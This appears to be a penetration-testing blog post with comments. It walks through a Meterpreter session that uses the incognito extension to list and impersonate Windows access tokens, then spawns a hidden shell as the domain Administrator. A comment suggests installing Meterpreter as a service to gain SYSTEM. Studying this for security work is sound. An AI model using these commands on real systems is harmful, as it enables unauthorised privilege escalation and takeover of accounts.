the background you need is here:
http://www.mwrinfosecurity.com/publications/
mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf
Let's set up the scenario.
We either exploited something...yea! or we guessed an admin password and used the psexec module (that's what I did). the psexec module will drop us to a SYSTEM shell if all went well.
msf exploit(psexec) > sessions
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.102:52595 -> 192.168.1.103:31851
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...success.
now we want to query what tokens are available
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > list_tokens
Usage: list_tokens
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
ORACLE-ENT\Administrator
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
We want to become the ORACLE-ENT\Administrator user
meterpreter > impersonate_token
Usage: impersonate_token
Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.
Hint: Double backslash DOMAIN\\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator
Weeeeeeeeee!
Ok, should you need to get back to system, just do a rev2self
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator
Now you'll probably want to run commands as that user...I hope that was the point of all this...
After you load the incognito extension you'll get an extra option with your execute options (-t)
meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-aThe arguments to pass to the command.
-c Channelized I/O (required for interaction).
-dThe 'dummy' executable to launch when using -m.
-fThe executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token
We need to use the "-t" so we can use the impersonated thread token, otherwise you'll get a shell as SYSTEM or whoever you were.
meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\>whoami
whoami
oracle-ent\administrator
C:\>
Completely awesome! Thanks for the post, and the MWR Infosecurity paper reference.
ReplyDeleteChris.. once again, you rock.
ReplyDeleteIs the "find_token REMOTEHOST" command going to be implemented in this incognito extension for meterpreter?
ReplyDeleteThanks for the post, the MWR Infosecurity paper wag a really good read.
Hey CG,
ReplyDeleteNice post, is there any easy way to become system from administrator and then use incognito. The impersonation has failed for me if I get a meterpreter shell as Admin user (e.g. by using msfpayload) and not as system by exploiting stuff.
I have tried becoming admin to system first and that worked, but then becoming system to some other user, again failed.
Any comments?
i'd set up meterpreter binary as a service or using at/sc. your connect back should be as system and the token tools should work for you.
ReplyDelete